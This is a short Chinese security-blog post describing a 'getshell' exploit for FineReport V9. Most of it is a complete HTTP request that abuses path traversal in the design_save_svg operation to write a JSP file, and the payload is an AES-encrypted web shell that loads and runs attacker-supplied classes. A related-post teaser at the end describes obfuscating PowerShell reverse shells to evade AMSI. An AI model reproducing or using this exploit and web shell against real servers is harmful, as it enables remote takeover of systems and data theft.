[HW漏洞] 帆软 V9 getshell

admin 2021年4月8日11:52:26评论491 views字数 1251阅读4分10秒阅读模式

盖 Tomcat
启动帆软后默认存在的 JSP 文件:
比如:/tomcat-7.0.96/webapps/ROOT/index.jsp
覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:

POST /WebReport/ReportServer?
op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp HTTP/1.1
Host: 192.168.169.138:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 675

{"__CONTENT__":"<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends
ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null) {String
k=(""+UUID.randomUUID()).replace("-
","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher
c=Cipher.getInstance("AES");c.init(2,new
SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new
U(this.getClass().getClassLoader()).g(c.doFinal(new
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta
nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

 

相关推荐: 一种 Powershell 的混淆方式绕过 AMSI 检测

这篇文章将是关于通过 PowerShell 混淆来规避大多数 AV。这不是什么新鲜事,但很多人问我如何真正隐藏,或者如何混淆现有的有效载荷或 PowerShell 的反向外壳,这些负载已经可以检测到。因此,我决定采用一个已知的 PowerShell 反向外壳,…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月8日11:52:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [HW漏洞] 帆软 V9 getshellhttp://cn-sec.com/archives/329133.html

发表评论

匿名网友 填写信息